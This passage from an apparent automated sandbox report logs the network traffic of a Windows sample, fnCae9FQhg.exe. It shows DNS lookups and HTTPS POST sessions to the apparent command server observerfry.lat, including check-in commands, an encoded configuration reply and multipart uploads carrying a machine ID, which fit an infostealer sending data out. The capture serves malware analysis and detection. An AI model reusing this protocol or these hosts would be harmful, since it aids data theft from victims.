                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com16.182.108.137A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com52.217.224.161A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.124A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com3.5.11.141A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com54.231.134.185A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com3.5.3.139A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.199A (IP address)IN (0x0001)false
                                                                                                                                                              Dec 24, 2024 11:22:39.690660000 CET1.1.1.1192.168.2.60x921aNo error (0)s3-w.us-east-1.amazonaws.com16.15.176.27A (IP address)IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • observerfry.lat
                                                                                                                                                              • bitbucket.org
                                                                                                                                                              • bbuseruploads.s3.amazonaws.com

                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.649713104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:15 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                              2024-12-24 10:22:16 UTC1117INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:16 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=fb162pkctdcutlldv4i6rilde5; expires=Sat, 19 Apr 2025 04:08:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdIRwGc9hCyL57BhaNDuv63OocoIFK6K87YTKAOdfTQk0YgwNFsgEnqbZRwLZw0JA22pLoATp8VGgX29DKou83grIcoM03YtSGayi1fLsgoX7kJUGbTXTQnQsLcd6QkFFHk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fde863f401a28-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1956&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1469552&cwnd=138&unsent_bytes=0&cid=b54e6378350c883d&ts=783&x=0"
                                                                                                                                                              2024-12-24 10:22:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                              2024-12-24 10:22:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.649715104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:17 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 53
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:17 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                              2024-12-24 10:22:18 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=cmns8npo8uptde5uko2mupdbei; expires=Sat, 19 Apr 2025 04:08:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9EK8%2B9lS%2FQWFqIpsN7x5uGAnu7Tspjz6%2ByoGSAuZKGvioaG2FVQLvw4UT7ATMsJiK%2Bd81cvTKriI8gmEoik4i46DDP0OBCsNz34IjUWScB30WyeHRWBI%2B%2FxXxB9evWip6a4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fde92cc35431f-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1562&rtt_var=600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1802469&cwnd=249&unsent_bytes=0&cid=82d6f977f16fcb10&ts=789&x=0"
                                                                                                                                                              2024-12-24 10:22:18 UTC240INData Raw: 34 39 31 63 0d 0a 72 36 52 51 74 75 76 38 4f 48 4d 42 4f 68 4f 75 4f 67 59 68 4e 38 38 4d 6a 79 45 4f 6b 32 6b 7a 75 53 6d 67 56 4d 73 75 78 4d 48 55 68 69 61 55 30 63 67 55 55 58 4a 66 4d 5a 52 4f 64 46 52 53 34 79 37 75 52 53 79 70 44 31 4c 56 57 73 56 34 36 56 69 70 34 35 58 43 4d 64 71 59 6d 52 52 52 5a 45 49 78 6c 47 46 39 41 31 4b 68 4c 72 55 44 61 2f 6b 4c 55 74 56 4c 77 54 2b 6b 58 71 69 69 78 38 67 33 33 6f 36 66 58 42 4a 74 56 33 62 4c 58 32 64 4c 57 61 5a 68 35 30 77 73 76 30 74 57 77 77 75 61 64 6f 5a 4c 73 4b 44 69 78 53 50 64 79 59 45 55 43 43 4e 66 66 59 77 41 4a 45 42 53 72 57 44 70 52 57 58 37 41 56 76 64 53 73 51 2b 75 30 65 69 71 63 66 47 4e 4e 2b 45 6c 6b 67 66 5a 31 42 39 7a 56 56 6e 41 78
                                                                                                                                                              Data Ascii: 491cr6RQtuv8OHMBOhOuOgYhN88MjyEOk2kzuSmgVMsuxMHUhiaU0cgUUXJfMZROdFRS4y7uRSypD1LVWsV46Vip45XCMdqYmRRRZEIxlGF9A1KhLrUDa/kLUtVLwT+kXqiix8g33o6fXBJtV3bLX2dLWaZh50wsv0tWwwuadoZLsKDixSPdyYEUCCNffYwAJEBSrWDpRWX7AVvdSsQ+u0eiqcfGNN+ElkgfZ1B9zVVnAx
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 76 74 61 66 55 44 4e 4c 46 59 59 39 68 61 30 79 4f 6b 58 4b 44 6a 30 6f 67 72 6c 49 36 53 47 6b 6b 6a 55 48 33 43 58 57 64 4d 55 71 78 75 2f 30 78 73 38 67 4e 5a 33 30 48 4e 4f 61 5a 43 72 4b 54 46 7a 7a 58 62 6a 70 5a 63 48 6d 41 59 50 34 78 66 66 41 4d 4e 37 55 37 39 51 47 2f 6c 42 6b 43 62 56 49 77 76 36 55 75 71 34 35 57 47 4e 4e 71 49 6b 31 6f 44 61 31 4e 36 79 55 70 76 53 6c 69 67 62 75 42 4a 59 2f 49 4c 56 74 46 42 7a 54 79 74 51 61 75 6c 7a 63 5a 79 6d 73 6d 5a 51 6c 45 37 47 46 4c 4a 53 47 4e 50 51 2b 39 55 72 56 77 69 36 45 74 57 31 77 75 61 64 71 46 4a 70 61 44 47 79 54 48 63 67 6f 78 61 41 32 56 56 64 4e 35 65 59 55 31 66 72 6e 7a 6e 54 57 72 79 41 6c 72 53 54 73 55 79 36 51 4c 6d 70 4e 57 47 61 70 53 6f 6b 31 45 64 61 55 39 78 6a 45 63 71 57
                                                                                                                                                              Data Ascii: vtafUDNLFYY9ha0yOkXKDj0ogrlI6SGkkjUH3CXWdMUqxu/0xs8gNZ30HNOaZCrKTFzzXbjpZcHmAYP4xffAMN7U79QG/lBkCbVIwv6Uuq45WGNNqIk1oDa1N6yUpvSligbuBJY/ILVtFBzTytQaulzcZymsmZQlE7GFLJSGNPQ+9UrVwi6EtW1wuadqFJpaDGyTHcgoxaA2VVdN5eYU1frnznTWryAlrSTsUy6QLmpNWGapSok1EdaU9xjEcqW
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 68 53 57 72 2b 42 6c 32 62 42 59 49 78 73 51 7a 2b 34 2b 66 46 4a 74 65 44 33 47 38 53 62 56 5a 32 32 68 68 37 44 55 7a 74 61 65 45 44 4e 4c 45 47 55 4e 4e 4e 30 44 6d 6b 54 36 69 74 77 73 4d 39 33 49 6d 65 56 78 52 6e 55 33 72 50 56 57 42 52 58 36 31 6d 36 45 4a 6d 2b 30 73 66 6d 30 7a 61 64 76 45 4d 6c 37 54 47 68 41 66 58 68 35 42 64 42 79 4e 48 50 39 55 59 59 30 38 56 39 53 37 67 53 32 6e 30 42 46 44 52 52 63 63 38 70 55 53 6f 6f 4e 2f 4a 4e 74 53 46 6c 6c 41 63 62 56 78 35 78 56 4e 76 52 56 57 73 5a 4b 30 4e 4c 50 59 54 45 59 4d 4c 39 6a 47 6c 51 61 6e 68 2b 4d 55 38 32 6f 36 49 47 67 34 74 51 54 48 4c 56 43 51 62 46 61 46 6e 37 55 68 6d 39 51 74 57 31 6b 37 42 4d 61 70 42 6f 61 6e 44 77 54 62 59 67 4a 4e 63 45 57 52 63 64 4e 35 64 62 55 39 5a 37 53
                                                                                                                                                              Data Ascii: hSWr+Bl2bBYIxsQz+4+fFJteD3G8SbVZ22hh7DUztaeEDNLEGUNNN0DmkT6itwsM93ImeVxRnU3rPVWBRX61m6EJm+0sfm0zadvEMl7TGhAfXh5BdByNHP9UYY08V9S7gS2n0BFDRRcc8pUSooN/JNtSFllAcbVx5xVNvRVWsZK0NLPYTEYML9jGlQanh+MU82o6IGg4tQTHLVCQbFaFn7Uhm9QtW1k7BMapBoanDwTbYgJNcEWRcdN5dbU9Z7S
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 37 6b 56 49 6d 30 7a 4f 64 76 45 4d 72 36 72 66 79 44 7a 64 68 4a 68 53 46 6d 31 56 65 73 70 54 59 30 52 54 6f 47 62 67 52 6d 2f 77 44 31 76 4a 53 4d 6b 38 70 45 62 6d 37 59 33 42 4b 70 54 52 33 6e 30 64 53 6b 68 71 33 6b 34 6b 58 42 75 30 4c 75 70 50 4c 4b 6c 4c 55 74 52 43 7a 54 36 68 51 36 6d 6e 77 38 41 30 32 59 79 52 55 41 4e 72 56 6e 7a 48 56 32 39 52 56 61 42 71 34 55 64 6b 2b 67 45 52 6c 51 76 46 4c 75 6b 55 35 70 62 41 79 54 4c 58 6e 39 35 46 58 33 6f 59 64 73 41 59 50 41 4e 5a 6f 32 37 69 54 32 44 36 41 31 44 58 52 63 55 7a 6f 45 53 75 73 63 7a 43 4f 74 57 48 6b 56 73 56 5a 6c 31 31 79 31 78 69 54 42 58 6a 4c 75 70 62 4c 4b 6c 4c 66 76 78 2b 67 42 65 54 44 4c 6e 74 31 49 59 31 32 4d 6e 47 47 68 31 67 56 48 6e 44 58 6d 31 50 58 36 52 6c 34 55 68
                                                                                                                                                              Data Ascii: 7kVIm0zOdvEMr6rfyDzdhJhSFm1VespTY0RToGbgRm/wD1vJSMk8pEbm7Y3BKpTR3n0dSkhq3k4kXBu0LupPLKlLUtRCzT6hQ6mnw8A02YyRUANrVnzHV29RVaBq4Udk+gERlQvFLukU5pbAyTLXn95FX3oYdsAYPANZo27iT2D6A1DXRcUzoESusczCOtWHkVsVZl11y1xiTBXjLupbLKlLfvx+gBeTDLnt1IY12MnGGh1gVHnDXm1PX6Rl4Uh
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 64 35 45 77 7a 65 76 58 71 47 71 33 38 67 2f 32 34 47 57 55 78 42 6e 58 58 7a 4b 56 47 35 43 55 71 4e 67 35 51 4d 69 73 51 78 4a 6d 78 4f 43 46 37 6c 58 74 4c 58 41 35 7a 2f 62 79 59 45 55 43 43 4e 66 66 59 77 41 4a 45 70 48 71 57 50 2f 53 6d 76 2f 42 46 4c 4a 53 73 38 39 75 30 75 70 70 38 72 4b 4e 4e 75 50 6e 31 38 62 62 31 39 30 78 31 64 6f 41 78 76 74 61 66 55 44 4e 4c 45 6c 57 73 68 63 77 54 69 69 57 72 33 6a 30 6f 67 72 6c 49 36 53 47 6b 6b 6a 57 33 72 48 58 47 52 50 56 61 6c 6a 37 56 46 6a 39 67 78 59 30 46 6e 49 4d 61 35 48 72 71 6a 43 77 43 44 59 68 34 78 66 41 33 45 59 50 34 78 66 66 41 4d 4e 37 56 6a 71 55 33 7a 79 53 57 44 4e 53 4e 51 39 70 45 44 6d 76 49 50 66 63 74 4f 46 33 67 4a 52 5a 56 64 34 7a 31 64 6c 53 6c 6d 67 61 2b 52 47 62 66 63 50
                                                                                                                                                              Data Ascii: d5EwzevXqGq38g/24GWUxBnXXzKVG5CUqNg5QMisQxJmxOCF7lXtLXA5z/byYEUCCNffYwAJEpHqWP/Smv/BFLJSs89u0upp8rKNNuPn18bb190x1doAxvtafUDNLElWshcwTiiWr3j0ogrlI6SGkkjW3rHXGRPValj7VFj9gxY0FnIMa5HrqjCwCDYh4xfA3EYP4xffAMN7VjqU3zySWDNSNQ9pEDmvIPfctOF3gJRZVd4z1dlSlmga+RGbfcP
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 45 74 36 56 50 6f 75 6f 33 42 50 70 54 52 33 6c 6b 57 59 46 6c 37 78 56 52 72 52 46 47 2f 5a 4f 70 52 62 66 41 41 58 4e 64 4c 7a 7a 75 6a 54 61 2b 75 77 63 73 31 30 34 61 62 47 6c 38 6a 58 32 6d 4d 41 43 52 69 57 4b 5a 69 74 68 6b 73 37 6b 56 49 6d 30 7a 4f 64 76 45 4d 70 71 6e 49 7a 44 2f 58 68 70 31 49 45 47 56 4b 63 63 46 53 64 6b 6c 65 71 47 50 67 54 6d 2f 33 44 56 72 58 57 63 73 32 71 6b 66 6d 37 59 33 42 4b 70 54 52 33 6e 6b 47 64 56 4a 32 77 45 35 76 51 6c 61 37 59 2f 30 44 49 72 45 61 56 73 6f 4c 6d 69 43 35 57 36 47 38 67 39 39 79 30 34 58 65 41 6c 46 6c 55 58 66 4c 58 6d 70 52 55 4b 74 68 34 6b 70 6c 39 51 4e 53 32 30 2f 47 4d 61 78 50 71 71 6a 4b 78 54 33 51 67 4a 42 54 48 69 4d 57 4d 63 74 41 4a 42 73 56 6a 48 58 75 54 32 47 78 46 42 2f 43 43
                                                                                                                                                              Data Ascii: Et6VPouo3BPpTR3lkWYFl7xVRrRFG/ZOpRbfAAXNdLzzujTa+uwcs104abGl8jX2mMACRiWKZithks7kVIm0zOdvEMpqnIzD/Xhp1IEGVKccFSdkleqGPgTm/3DVrXWcs2qkfm7Y3BKpTR3nkGdVJ2wE5vQla7Y/0DIrEaVsoLmiC5W6G8g99y04XeAlFlUXfLXmpRUKth4kpl9QNS20/GMaxPqqjKxT3QgJBTHiMWMctAJBsVjHXuT2GxFB/CC
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 4c 76 75 4f 56 68 68 4c 66 6e 35 74 64 42 79 46 74 63 73 4a 57 59 31 55 56 73 6c 47 6a 41 32 50 72 53 77 6e 69 55 6f 49 78 70 51 7a 2b 34 39 6a 42 4d 74 4f 54 69 46 30 64 63 6c 4e 38 77 48 70 72 52 45 4f 75 59 65 35 53 5a 62 30 41 58 4a 73 46 67 6a 47 78 44 50 37 6a 34 73 45 6b 31 36 61 64 53 78 67 6a 46 6a 48 4c 54 69 51 62 46 5a 4d 75 2f 30 42 38 38 67 52 41 35 51 75 61 4c 35 63 4d 72 62 58 4b 31 6a 48 43 67 70 4e 57 41 46 30 59 4b 5a 67 4b 4e 68 45 48 2f 33 47 74 58 46 4f 2f 53 31 43 62 45 2f 73 76 36 56 72 6d 2b 35 2b 49 63 73 62 4a 78 68 70 57 59 45 70 6a 79 6c 74 79 51 42 4b 54 55 4d 70 56 5a 76 59 62 56 73 78 45 67 6e 6a 70 51 2b 62 37 39 49 59 37 30 35 4b 50 54 42 78 7a 58 7a 48 7a 46 69 52 62 46 66 55 75 32 45 42 69 2f 77 78 48 79 67 62 6c 49 4b
                                                                                                                                                              Data Ascii: LvuOVhhLfn5tdByFtcsJWY1UVslGjA2PrSwniUoIxpQz+49jBMtOTiF0dclN8wHprREOuYe5SZb0AXJsFgjGxDP7j4sEk16adSxgjFjHLTiQbFZMu/0B88gRA5QuaL5cMrbXK1jHCgpNWAF0YKZgKNhEH/3GtXFO/S1CbE/sv6Vrm+5+IcsbJxhpWYEpjyltyQBKTUMpVZvYbVsxEgnjpQ+b79IY705KPTBxzXzHzFiRbFfUu2EBi/wxHygblIK
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 38 38 63 2f 32 38 57 51 55 52 46 6b 53 47 66 58 46 47 78 41 54 37 64 51 30 32 68 67 39 77 78 4c 33 45 33 6b 46 75 6b 43 35 71 79 4e 6e 67 75 55 77 64 35 6c 58 79 4e 41 4d 5a 51 59 55 55 42 62 6f 32 6e 37 55 69 48 5a 4b 47 76 68 43 65 34 78 76 41 36 53 70 4e 33 58 4f 64 6d 46 33 68 52 52 5a 52 67 70 6e 42 59 6b 52 30 54 74 4e 72 30 52 4e 36 52 59 42 6f 73 5a 33 58 69 77 44 4c 44 6a 6c 5a 52 38 6c 4a 76 65 41 6c 45 6b 57 32 50 65 58 6d 64 56 56 75 70 51 30 32 52 69 39 67 70 48 79 31 7a 4e 43 4a 64 5a 70 61 33 44 77 53 54 46 79 64 41 61 48 69 4d 41 53 49 77 51 4a 48 77 62 37 58 61 74 47 79 7a 45 43 46 2f 56 54 4e 51 6e 35 47 75 6f 70 4d 7a 51 49 73 4f 47 33 68 52 52 5a 52 67 70 6e 68 59 6b 52 30 54 74 4e 72 30 52 4e 36 52 59 42 6f 73 5a 33 58 69 77 44 4c 44
                                                                                                                                                              Data Ascii: 88c/28WQURFkSGfXFGxAT7dQ02hg9wxL3E3kFukC5qyNnguUwd5lXyNAMZQYUUBbo2n7UiHZKGvhCe4xvA6SpN3XOdmF3hRRZRgpnBYkR0TtNr0RN6RYBosZ3XiwDLDjlZR8lJveAlEkW2PeXmdVVupQ02Ri9gpHy1zNCJdZpa3DwSTFydAaHiMASIwQJHwb7XatGyzECF/VTNQn5GuopMzQIsOG3hRRZRgpnhYkR0TtNr0RN6RYBosZ3XiwDLD
                                                                                                                                                              2024-12-24 10:22:18 UTC1369INData Raw: 74 6d 47 6d 52 67 78 5a 45 35 79 6a 42 59 6b 54 78 58 31 4c 75 78 4a 66 50 77 45 56 70 64 4d 32 44 48 70 41 75 61 74 6a 5a 35 79 31 59 4f 4f 56 78 35 6b 46 48 66 43 56 69 52 63 47 37 51 75 2b 77 4d 30 6f 6b 55 52 79 51 75 61 64 75 35 50 74 4c 48 4c 78 53 54 58 7a 71 42 6b 50 48 46 66 59 63 38 61 56 55 35 52 75 33 76 75 55 32 76 50 4e 58 7a 4a 54 4e 49 31 36 33 32 77 6f 4d 33 49 4e 5a 54 48 33 6b 4a 52 4f 78 68 63 33 6c 39 30 51 42 58 6a 4c 75 45 44 4e 4c 45 47 51 39 78 62 77 58 71 75 56 71 48 6a 30 6f 67 72 6c 4a 2f 65 41 6b 49 74 47 47 4f 4d 41 43 51 45 57 36 42 76 37 6b 31 76 34 78 6c 58 32 46 33 42 63 5a 64 79 69 37 48 4b 31 6a 47 57 75 4a 4e 65 42 33 5a 62 59 63 74 6d 57 6d 35 48 71 6e 37 75 41 55 44 32 42 6c 33 6c 64 66 55 6e 72 6c 7a 6b 68 63 37 51
                                                                                                                                                              Data Ascii: tmGmRgxZE5yjBYkTxX1LuxJfPwEVpdM2DHpAuatjZ5y1YOOVx5kFHfCViRcG7Qu+wM0okURyQuadu5PtLHLxSTXzqBkPHFfYc8aVU5Ru3vuU2vPNXzJTNI1632woM3INZTH3kJROxhc3l90QBXjLuEDNLEGQ9xbwXquVqHj0ogrlJ/eAkItGGOMACQEW6Bv7k1v4xlX2F3BcZdyi7HK1jGWuJNeB3ZbYctmWm5Hqn7uAUD2Bl3ldfUnrlzkhc7Q


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.649721104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:20 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=AK1OA31E9
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 12811
                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                              2024-12-24 10:22:20 UTC12811OUTData Raw: 2d 2d 41 4b 31 4f 41 33 31 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 44 46 37 38 39 32 39 35 30 36 37 46 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 41 4b 31 4f 41 33 31 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 4b 31 4f 41 33 31 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 41 4b 31 4f 41 33 31 45 39 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                              Data Ascii: --AK1OA31E9Content-Disposition: form-data; name="hwid"7CDF789295067FF1BEBA0C6A975F1733--AK1OA31E9Content-Disposition: form-data; name="pid"2--AK1OA31E9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--AK1OA31E9Conten
                                                                                                                                                              2024-12-24 10:22:21 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 24 Dec 2024 10:22:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=mvbvo48v0ngs99attplq4otjov; expires=Sat, 19 Apr 2025 04:09:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AYdnZEHWdihWw3MQOoj6sHphW1hPnd8LOROHPdOH9b87VTf5%2FffOK7espiT33TEq74k3d9JSl0%2FxStkWACSSRVOs2HNiZ2CMErfoujVVlqiJoj30xblQFuVohxl55i6MUUw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8f6fdea44c837d18-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1978&rtt_var=744&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13741&delivery_rate=1468074&cwnd=218&unsent_bytes=0&cid=a27d23238b1ce688&ts=1068&x=0"
                                                                                                                                                              2024-12-24 10:22:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2024-12-24 10:22:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.649728104.21.36.201443404C:\Users\user\Desktop\fnCae9FQhg.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-12-24 10:22:23 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=E8YHW9WJ7TL56BA
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 15093
                                                                                                                                                              Host: observerfry.lat
